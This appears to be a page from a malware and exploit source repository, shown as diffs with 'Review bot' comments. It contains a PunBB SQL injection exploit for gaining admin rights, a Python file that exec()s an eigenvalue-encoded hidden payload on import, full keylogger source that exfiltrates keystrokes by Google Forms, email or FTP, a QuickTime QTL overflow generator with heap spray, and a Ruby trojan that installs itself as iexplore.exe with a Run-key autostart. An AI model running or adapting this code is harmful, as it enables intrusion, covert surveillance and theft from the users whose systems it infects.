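Review bot: The only identification of the targeted flaw is the runtime banner `MS06-036 DHCP Client Domain Name Overflow`; the header comment names neither the bulletin nor the remediation, so I would add beneath the author lines `# Targets the DHCP client issue addressed by MS06-036; patched clients are the fix`. In `HandleDhcpDiscover` the five identical `append = "\xfa\xff" + ...` assignments are dead, because the offer is encoded with `EncodePacket('')`; a comment saying so would stop readers assuming the offer carries the oversized options. For detection, what the visible code puts on the wire is an offer whose `domain_name` is 255 `N` bytes and an ACK followed by a long run of `\xfa\xff`-prefixed 255-byte blocks, sent as IP fragments via `fragment(..., 1024)`. The file's path is not shown in this section of the page.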


@ -0,0 +1,130 @@
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()
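Review bot: The banner states the root cause in one line (`user-supplied data within the database is still user-supplied data`) but the file gives no remediation, so I would add under it `# Mitigation: treat values read back from the DB as untrusted; escape/parameterise them in the change_email path and run a release newer than 1.2.4`. From the visible code, the request that matters for log review is the POST to `profile.php?action=change_email` whose `req_new_email` value has a quoted local part, padding spaces and the text `group_id=`; a legitimate address change would not contain those. The script is Python 2 (`print` statements, `urllib.URLopener`), and its path is not shown in this section of the page.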

208
Python/Kirk_ransomware.py Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

BIN
Python/Scrypt.7z Normal file

Binary file not shown.

BIN
Python/Sin.7z Normal file

Binary file not shown.


@ -0,0 +1,98 @@
def root3(num):
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
a=num**(1/3.0)
b=a*fak1
c=a*fak2
return([a,b,c])
def getPQ(a,b,c):
p = b-((a**2)/3.0)
q = c + ((2*(a**3)-9*a*b)/27.0)
return([p,q])
def getU(p,q):
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
return(root3(u3))
def getLambda(a,p,u):
if u[0] == 0:
L0=u[0] - a/3.0
else:
L0=u[0] - p/(3.0*u[0]) - a/3.0
if u[1] == 0:
L1=-a/3.0
else:
L1=u[1] - p/(3.0*u[1]) - a/3.0
if u[2] == 0:
L2=-a/3.0
else:
L2=u[2] - p/(3.0*u[2]) - a/3.0
return(L0,L1,L2)
def getABC(mtx):
a=-(mtx[0]+mtx[4]+mtx[8])
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
return([a,b,c])
def eigenvalues(mtx):
ABC=getABC(mtx)
PQ=getPQ(ABC[0],ABC[1],ABC[2])
U=getU(PQ[0],PQ[1])
L=getLambda(ABC[0],PQ[0],U)
return(L)
def getstring(M):
str=''
for c in range(len(M)):
mLD=eigenvalues(M[c])
for i in range(len(mLD)+1):
for n in range(len(mLD)):
if round(mLD[n].imag)==i:
str+=chr(int(round(mLD[n].real)))
return(str)
M=[]
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
myMTXcode=getstring(M)
exec(myMTXcode)
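Review bot: The section ends in `exec(myMTXcode)`, and `myMTXcode` is assembled by `getstring` from the rounded real parts of each matrix's eigenvalues, so the text that gets executed appears nowhere in the file as a string and a source or string scan will not show what runs. Because the call sits at module level, simply running or importing the file executes it. For an archive entry I would add a header comment that says so, for example `# Sample: payload is encoded in M as eigenvalues and run by exec() at module level; do not import or execute outside an isolated analysis VM`. As a smaller point, the local `str` in `getstring` shadows the builtin.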

210
Python/xenotix.py Normal file

@ -0,0 +1,210 @@
'''
Xenotix Python Keylogger for Windows
====================================
Coded By: Ajin Abraham <ajin25@gmail.com>
Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
FEATURES
========
1.STORE LOGS LOCALLY
2.SEND LOGS TO GOOGLE FORMS
3.SEND LOGS TO EMAIL
4.SEND LOGS TO FTP
MINIMUM REQUIREMENTS
===================
Python 2.7: http://www.python.org/getit/
pyHook Module: http://sourceforge.net/projects/pyhook/
pyrhoncom Module: http://sourceforge.net/projects/pywin32/
pyHook Module -
Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
'''
try:
import pythoncom, pyHook
except:
print "Please Install pythoncom and pyHook modules"
exit(0)
import os
import sys
import threading
import urllib,urllib2
import smtplib
import ftplib
import datetime,time
import win32event, win32api, winerror
#Disallowing Multiple Instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "Multiple Instance not Allowed"
exit(0)
x=''
data=''
count=0
#Hide Console
def hide():
import win32console,win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window,0)
return True
def msg():
print """Xenotix Python Keylogger for Windows
Coder: Ajin Abraham <ajin25@gmail.com>
OPENSECURITY.IN
usage:xenotix_python_logger.py mode
mode:
local: store the logs in a file [keylogs.txt]
remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
"""
return True
#Local Keylogger
def local():
global data
if len(data)>100:
fp=open("keylogs.txt","a")
fp.write(data)
fp.close()
data=''
return True
#Remote Google Form logs post
def remote():
global data
if len(data)>100:
url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
try:
dataenc=urllib.urlencode(klog)
req=urllib2.Request(url,dataenc)
response=urllib2.urlopen(req)
data=''
except Exception as e:
print e
return True
#Email Logs
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>100:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com" #Specify Server Here
PORT = 587 #Specify Port Here
USER="your_email@gmail.com"#Specify Username Here
PASS="password_here"#Specify Password Here
FROM = USER#From address is taken from username
TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
SUBJECT = "Keylogger data: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
#Upload logs to FTP account
def ftp():
global data,count
if len(data)>100:
count+=1
FILENAME="logs-"+str(count)+".txt"
fp=open(FILENAME,"a")
fp.write(data)
fp.close()
data=''
try:
SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
USERNAME="ftp_username" #Specify your FTP Username
PASSWORD="ftp_password" #Specify your FTP Password
SSL=0 #Set 1 for SSL and 0 for normal connection
OUTPUT_DIR="/" #Specify output directory here
if SSL==0:
ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
elif SSL==1:
ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
ft.cwd(OUTPUT_DIR)
fp=open(FILENAME,'rb')
cmd= 'STOR' +' '+FILENAME
ft.storbinary(cmd,fp)
ft.quit()
fp.close()
os.remove(FILENAME)
except Exception as e:
print e
return True
def main():
global x
if len(sys.argv)==1:
msg()
exit(0)
else:
if sys.argv[1]=="local":
x=1
hide()
elif sys.argv[1]=="remote":
x=2
hide()
elif sys.argv[1]=="email":
hide()
email=TimerClass()
email.start()
elif sys.argv[1]=="ftp":
x=4
hide()
else:
msg()
exit(0)
return True
main()
def keypressed(event):
global x,data
if event.Ascii==13:
keys='<ENTER>'
elif event.Ascii==8:
keys='<BACK SPACE>'
elif event.Ascii==9:
keys='<TAB>'
else:
keys=chr(event.Ascii)
data=data+keys
if x==1:
local()
elif x==2:
remote()
elif x==4:
ftp()
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard()
pythoncom.PumpMessages()
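Review bot: The docstring lists features but not the traces the script leaves on a host, which is what someone pulling this sample for detection work needs. From the code these are the named mutex `mutex_var_xboz`, the append-mode file `keylogs.txt` (local mode), `logs-<n>.txt` files that are written and then removed after upload (ftp mode), a console window hidden with `ShowWindow(window,0)`, and a global `pyHook` keyboard hook. I would add them as a comment block under the docstring, together with a line noting that the mutex check, `main()` and `HookKeyboard()` appear to run at module level (indentation is lost in this view), so analysis tooling should not import the file.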


@ -0,0 +1,61 @@
#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as a cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"
# Mac OS X 10.4.8 (8L2127)
EBP_ADDR = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR = 0x916c24bc # /usr/bin/curl
SHELL_ADDR = 0x918bef3a # /bin/sh
CMDSTR_ADDR = [
SHELL_ADDR, # 0 addr to static /bin/sh (lame)
0x017a053c, # 1 addr to our command string (cool) :> (change as necessary)
0xbabeface, # 2 bogus addr for testing.
CURL_ADDR # 3 addr to '/usr/bin/curl'
]
# Payload. default to CMDSTR_ADDR 0 (/bin/sh)
HAPPY = ("A" * 299) +
[EBP_ADDR].pack("V") +
[SYSTEM_ADDR].pack("V") +
[SETUID_ADDR].pack("V") +
[CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR)
# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
BOYZ = ("\x90" * 30000) + "FOOM" # and more
# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
target_file = File.open("pwnage.qtl", "w+") { |f|
f.print(QTL_CONTENT)
f.close
}
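Review bot: The comment header credits the authors and links the MOAB advisory but never describes the generated `pwnage.qtl`, so the entry is hard to use for filter or signature work. From the template, the output is a QuickTime media link whose `moviename`, `qtnext`, `type` and `src` attributes each embed a 30000-byte run of `\x90`, and whose `rtsp://` `src` ends in a colon followed by 299 `A` bytes and four packed 32-bit values. I would add a comment stating that, and repeating that the address constants are tied to Mac OS X 10.4.8 (8L2127) as the existing comment says. Separately, the `f.close` inside the `File.open` block is redundant, since the block form closes the file itself.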


@ -0,0 +1,574 @@
$KCODE = 's'
#$DEBUG = true
#Exerb = nil
require 'Win32API'
if ARGV.size == 1 and ARGV[0].include?('RoAddr')
$path = ARGV[0]
if File.exist?($path)
$rost = Win32API.new($path, 'RO_GetNowState', '', 'l')
$rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p')
$ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p')
$roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i')
$roin.call(0, '', 0x7FFFFFFF)
$rost.call
if $rost.call == 2
print $ropa.call(258).to_s + "[#{$rowld.call}]"
end
end
exit
end
require 'win32/registry'
require 'ftools'
def dll(file)
if !File.exist?('C:/windows/system32/' + file)
f = Exerb.open(file)
f.binmode
open('C:/windows/system32/' + file, 'w'){|f2|
f2.binmode
f.read 9
p f2.write(f.read)
}
f.close
end
end
if Exerb
if !Exerb.filepath.include?('iexplore')
File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe')
`start install.exe`
dll('zlib.dll')
dll('7-zip32.dll')
dll('imgctl.dll')
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
`start C:\\windows\\system32\\iexplore.exe`
exit
else
=begin
$double = Thread.new{
cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l')
rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l')
ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l')
om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l')
gle = Win32API.new('kernel32', 'GetLastError', '', 'l')
hage = cm.call(0, 0, 'hagemoe')
if gle.call == 183
ch.call hage
hage = nil
hagege = cm.call(0, 0, 'hagegemoe')
if gle.call == 183
ch.call hagege
exit 1
end
elsif
0
end
if hage
s = 'hagegemoe'
else
s = 'hagemoe'
end
while(1)
a = om.call(1, 0, s)
if a == 0
if ARGV[0] == 'aaa'
p system("start #{Exerb.filepath}")
else
p system("strat #{Exerb.filepath} aaa")
end
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
sleep 0.1
else
ch.call(a)
end
#p "sss"
sleep 0.04
end
}
=end
end
end
if ARGV[0] == 'aaa'
sleep
end
END {
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
}
require 'kconv'
require 'web/agent'
require 'web/linkextor'
$wait_time = 1
$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']]
$category = ''
$bbs = ''
$ropath = []
$korepath = []
$nypath = []
$toolpath = []
$charanames = []
$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe']
$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe']
$kakikomi = []
$id = ''
$charaarr = []
$charas = ''
$tekito_id = ''
def Dir.copy(from, to, *jogai)
begin
sleep 0.01
Dir.foreach(from){|x|
if !x.match(/^\.\.?/)
if File.directory?(from + x)
Dir.mkdir(to + x)
Dir.copy(from + x + '/', to + x + '/', *jogai)
else
